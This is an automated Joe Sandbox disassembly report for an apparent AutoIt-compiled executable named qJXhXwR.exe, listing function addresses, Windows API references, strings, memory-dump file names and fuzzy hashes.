AutoIt3GUI, xrefs: 00007FF7A5211E7C

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
Instruction ID: 28a3f1d16fbbd9d98bb2ddbbbeee9a3e76b147775b019728a78fff31f6667dcb
Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
Instruction Fuzzy Hash: CA914A72605B4682DB24EF29E8402AEB3A4FB89F84F928036DF8D43768DF39D455C710

Function 00007FF7A51DD0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51DD0EB

Strings

gfff, xrefs: 00007FF7A51DD216
e+000, xrefs: 00007FF7A51DD193

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
Instruction ID: d4f9126ac9607feaf71bbf3ddc82d2686f4e4698d47720e639355c930e9a3de1
Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
Instruction Fuzzy Hash: EC514963B1A7C146E7269F35E940379AB91EB82F90F898631C79C47BE9CE2CE044C710

Function 00007FF7A51DA09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51DA0C6
GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7A51C529A), ref: 00007FF7A51DA0E2

Strings

C:\Users\user\AppData\Roaming\qJXhXwR.exe, xrefs: 00007FF7A51DA0D0

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Roaming\qJXhXwR.exe
API String ID: 3307058713-3318304418
Opcode ID: 6c87e2de3f4c0aeac315ff4329a83c64bfbcc05b24579d353487348f4d7a711e
Instruction ID: e164933b5c7d29d0f1f91d1cc32619403dcaa24056c02b77e56823d26d27f4b9
Opcode Fuzzy Hash: 6c87e2de3f4c0aeac315ff4329a83c64bfbcc05b24579d353487348f4d7a711e
Instruction Fuzzy Hash: 0D418173A0B65285E716EF25E8400B9A3A4EF46F94FD64035EE4E477A9DE3DE441C320

Function 00007FF7A5249E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

DestroyWindow.USER32 ref: 00007FF7A5249F43

Strings

static, xrefs: 00007FF7A5249E54

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$CreateDestroyMessageObjectSendStock
String ID: static
API String ID: 3467290483-2160076837
Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
Instruction ID: 9bef2cd9d8a6a5c9c0500fb11231693ef4cfc5a56330cff99fb2af9c362a28d7
Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
Instruction Fuzzy Hash: C3415E726496C2C6D670AF21E4407AEB7A1FB85B90F514235EBE903AA9DF3CD481CB50

Function 00007FF7A5235E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A52361CC: WideCharToMultiByte.KERNEL32 ref: 00007FF7A523620C

inet_addr.WSOCK32(?,?,?,?,?,?,?,00007FF7A52337FB), ref: 00007FF7A5235E4D
htons.WSOCK32(?,?,?,?,?,?,?,00007FF7A52337FB), ref: 00007FF7A5235EDB

Strings

255.255.255.255, xrefs: 00007FF7A5235E6A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
Instruction ID: e699fe052311ecd5437a469654b5fda5dd429abb18dd68d5a6925e7e98eaf471
Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
Instruction Fuzzy Hash: EA31D2A2B0964281EB25EB22E84427DA760FF66FA4F868531DE5E433E9DE3CD445C310

Function 00007FF7A52303C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7A523045A

Strings

AUTOITCALLVARIABLE%d, xrefs: 00007FF7A523044A
, $, xrefs: 00007FF7A5230495

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3988819677-2584243854
Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
Instruction ID: b0b108f30ca165e77b031c1385437aa933123dbda5f6ae56b6983eba05f0128f
Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
Instruction Fuzzy Hash: C13181B6B09A0295E715EB61E8501FC63A1FB56F84F824032DA0E177ADCF3CE506C360

Function 00007FF7A524B224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

SetWindowPos.USER32 ref: 00007FF7A524B31B

Strings

SysTabControl32, xrefs: 00007FF7A524B278
, xrefs: 00007FF7A524B2FE

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$CreateMessageObjectSendStock
String ID: $SysTabControl32
API String ID: 2080134422-3143400907
Opcode ID: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
Instruction ID: d675bf65700c47e8301c7d256a9af7ad91ed7cf5da6b5cb32407f0aef552bd27
Opcode Fuzzy Hash: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
Instruction Fuzzy Hash: ED3169725097C1CAE770DF25E84479AB7A0F785BA4F544335EAA817AE8CB38D481CF10

Function 00007FF7A51DDC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7A51DDCA2
GetFileType.KERNEL32 ref: 00007FF7A51DDCB8

Strings

@, xrefs: 00007FF7A51DDCE3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
Instruction ID: 2c5304984192e6989e5978a4114b6eb6be507c0f18cfd4f97a25761d6480e3f4
Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
Instruction Fuzzy Hash: 61210B63A0BB5241EB619B24E490139A650EB87F74F6A1B39D66E037FCCE3CD481C310

Function 00007FF7A524A0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

GetWindowRect.USER32 ref: 00007FF7A524A18B
GetSysColor.USER32 ref: 00007FF7A524A1B2

Strings

static, xrefs: 00007FF7A524A10B

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
Instruction ID: 4c670e7ddd0111d90e79f9b1cf561fa06aa86ed2c28ffebb6509bf62ccccb19d
Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
Instruction Fuzzy Hash: 51313B72A097818BE324DF29E440B5AB7B1F788B50F514239EB9D43BA8DB38E441CF10

Function 00007FF7A5249868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

SendMessageW.USER32 ref: 00007FF7A524994F
SendMessageW.USER32 ref: 00007FF7A5249963

Strings

Combobox, xrefs: 00007FF7A5249905

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Combobox
API String ID: 1025951953-2096851135
Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
Instruction ID: 31ba5dd2b778df50fe4c6f3222257da35ab550c5a2542c8a33afa6b21312c0e5
Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
Instruction Fuzzy Hash: FB314C726097C1C6E770DF25B844B5AB7A1F785B90F504235EAA803BA9CB3DD845CF10

Function 00007FF7A5249BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 00007FF7A5249CB6
SendMessageW.USER32 ref: 00007FF7A5249CCA

Strings

edit, xrefs: 00007FF7A5249C24

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
Instruction ID: 364ae794c5fe834b746b034ba5e4a0ea7bbf8e681af87cd5cc3e51241ae92619
Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
Instruction Fuzzy Hash: 93316E72A09781CAE770DB15E84075AB7A1F789B90F504235EA9C43BACCB3CD841CF10

Function 00007FF7A51DFD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF7A51DFEA2

Strings

", xrefs: 00007FF7A51DFE7B
pow, xrefs: 00007FF7A51DFE91

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _handle_error
String ID: "$pow
API String ID: 1757819995-713443511
Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
Instruction ID: bd7771da087dab16cf1e403fe4ecebdaf4e58e7e47822901e1aed83acc5d832b
Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
Instruction Fuzzy Hash: 4D217873C19A8483E371DF10F04077AEAA0FBDA748F612325F28906969CBBCD285CB40

Function 00007FF7A520DDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5210730: GetClassNameW.USER32 ref: 00007FF7A521075B

SendMessageW.USER32 ref: 00007FF7A520DE7F

Strings

ComboBox, xrefs: 00007FF7A520DE0B
ListBox, xrefs: 00007FF7A520DE42

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
Instruction ID: be08523bfa3cdb0b770b712fb4b15be028c2801b4ea437b2d757b88233fb5ec1
Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
Instruction Fuzzy Hash: F311D8A2A0B78191F611EB11D8400F9A361FB96FA0F864231DAAD477EEDE3CD505C750

Function 00007FF7A522E708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FF7A522E772
InternetSetOptionW.WININET ref: 00007FF7A522E7A4

Strings

<local>, xrefs: 00007FF7A522E749

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
Instruction ID: 1cf2205ab79d249ccf7a575059c827fb21a0989d6ee8686d3f155b09ef037226
Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
Instruction Fuzzy Hash: 0B11C87AA1A64182F7509B11E8003BDA365E782F48FE54035DB4D066ECDF3DD882D710

Function 00007FF7A520DD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5210730: GetClassNameW.USER32 ref: 00007FF7A521075B

SendMessageW.USER32 ref: 00007FF7A520DDCE

Strings

ComboBox, xrefs: 00007FF7A520DD5D
ListBox, xrefs: 00007FF7A520DD92

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
Instruction ID: 228008cc6a5d9f3624a1165143a7a3d21bf88cf6524a5b792eee769c2432cc8b
Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
Instruction Fuzzy Hash: 7511B6A2A0B68151FB11E710E5511FAA750FF87F80FC64130D68D076EEDE2CD606CB10

Function 00007FF7A520DCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5210730: GetClassNameW.USER32 ref: 00007FF7A521075B

SendMessageW.USER32 ref: 00007FF7A520DD26

Strings

ComboBox, xrefs: 00007FF7A520DCB5
ListBox, xrefs: 00007FF7A520DCEA

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
Instruction ID: d7385c009394ec025bc5fd25b773750f0576d569d95b48e4d07fa0cc7d66ae32
Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
Instruction Fuzzy Hash: 691189A2B1B68152FB11EB10E5511FA9360FF8AB80FC54531E68D076EEDF2CD506CB50

Function 00007FF7A524FEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 00007FF7A524FF29
CloseHandle.KERNEL32 ref: 00007FF7A524FF3A

Strings

, xrefs: 00007FF7A524FF01

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-3916222277
Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
Instruction ID: f1e15fa304c8077f6603d91f7bbd8c95309f6c7823f10a5e93663c4876d083c9
Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
Instruction Fuzzy Hash: EB115171A09741C6E720AF16F80016AF6A1FB95B80F864135EA4D47BB8CF3DD450CB10

Function 00007FF7A520DEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5210730: GetClassNameW.USER32 ref: 00007FF7A521075B

